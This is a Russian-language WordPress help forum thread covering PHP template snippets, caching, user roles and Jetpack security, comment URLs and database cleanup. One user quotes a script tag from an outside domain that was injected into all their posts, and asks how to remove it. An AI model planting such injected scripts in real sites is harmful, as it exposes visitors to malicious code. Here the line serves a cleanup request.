Спрашиваем и отвечаем по Wordpress-9

SeVlad
На сайте с 03.11.2008
1609

Коллеги, напоминаю.

SeVlad:
Для показа небольших участков кода используйте bb-код [code][/code]. Большие простыни помещайте на http://pastebin.com, http://jsfiddle.net/ и тп сервисы.

Иначе ваш код нечитабелен (лично я такие посты вообще игнорирую. Уверен, что не только я) и может ломать страницу форума (в этом случае могу и удалить пост).

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
wturm
На сайте с 01.04.2010
77

Вопрос решился, спасибо незнакомому чуваку со скайпа)

<?php if( get_the_content() != '' ): ?>
<p class="goods-price-single">Дополнительные сведения:</p>
<div class="entry-content"> <?php the_content(); ?></div>
<?php endif ?>
A
На сайте с 20.08.2010
775

Кто использует гипер кэш, не в курсе, зачем автор перешел на документы в html? Они больше по размеру и больше грузят сервер.

ZA
На сайте с 19.05.2015
40
ZNA

есть ли плагины для автоматического репоста новостей\текста с заданных сайтов на свой?

S3
На сайте с 28.12.2010
134

во все записи понакидывало вот такой ерунды:

<script src="//wollses.com/steps"></script>

антималваре не чего не находит. Чем побороть?

S
На сайте с 04.04.2014
41

Подскажите, можно ли безопасно доверить наполнять сайт "левому" человеку и какую роль выбрать для полноценного постинга (Текст, картинки, видео, ссылки всякие)? Участник (Contributor) или автор (Author)?

Меня смущает, что на сайте подключен jetpack и любому зарегистрированному можно подключиться к нему - вот и вопрос: Не будет ли выхода через него к функциям и настройкам, которые ставят сайт под угрозу?

Под "безопасно наполнять сайт" я не имею ввиду внешние ссылки на ГС и доры и тому подобное.

Имею ввиду не будет ли технической возможности убить сайт, доступа к коду, полному функционалу сайта и тд? Так вроде к настройкам доступа нет, но может есть какие-то хитрости - поделитесь пожалуйста. 🍿

A
На сайте с 15.01.2014
49

Какуй часть кода надо удалить и где, чтобы полностью удалить ссылки к комментариям, поидее это не нузные ссылки только дубликаты делают

Вот такие

site.ru/nazvanie-zagalovka#comment-12345

site.ru/nazvanie-zagalovka?replytocom=2134#respond

Продаю программу для Арбитража криптовалюты. () Anonyk@mail.ru
S
На сайте с 04.04.2014
41
schulz:
Подскажите, можно ли безопасно доверить наполнять сайт "левому" человеку и какую роль выбрать для полноценного постинга (Текст, картинки, видео, ссылки всякие)? Участник (Contributor) или автор (Author)?

Меня смущает, что на сайте подключен jetpack и любому зарегистрированному можно подключиться к нему - вот и вопрос: Не будет ли выхода через него к функциям и настройкам, которые ставят сайт под угрозу?

Под "безопасно наполнять сайт" я не имею ввиду внешние ссылки на ГС и доры и тому подобное.
Имею ввиду не будет ли технической возможности убить сайт, доступа к коду, полному функционалу сайта и тд? Так вроде к настройкам доступа нет, но может есть какие-то хитрости - поделитесь пожалуйста. 🍿

В данный момент времени вопрос потерял актуальность - спарсил сайт, за что получил спасибо от правообладателя)

Но все равно, осталось интересно, где можно прочитать про права пользователей регистрирующихся на сайте. Гугл молчит с трех попыток поиска по искомым фразам.

A
На сайте с 15.01.2014
49
web2033:
post_content вместо post_title

А есть запрос SQL который бы заменял бы только текст без учета html кодов, проблема в том что у меня 1000 записей и в некоторых из них ccылки <a href без ковычки тем самым код не правильный и он в виде текста, я бы отел в таком случае удалить этот оставшийся кусок кода, а если я просто ввиду данный запрос то он мне удалит и орошие ссылки, есть запрос который удаляет текст без учета html разметок

SeVlad
На сайте с 03.11.2008
1609
srs3000:
Чем побороть?

Удалять и искать дыру. Удалять можно плагинами поиска замены или этим скриптом. По безопасности - в этот раздел и закреплённый топик

Anonyk:
поидее это не нузные ссылки только дубликаты делают

Никаких дубликатов. Учи матчасть.

schulz:
Но все равно, осталось интересно, где можно прочитать про права пользователей регистрирующихся на сайте.

В кодексе :)

Если интересно пообсуждать вопросы "левых юзеров" и тп - создай отдельный топик, поговорим. ;)

Anonyk:
А есть запрос SQL который бы заменял

Никогда не лезь в базу руками! Используй родные для этого механизмы - плагины или спец скрипт, на который я дал ссылку выше в ответе srs3000-у. Используя регулярки всё что нужно можно удалить.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий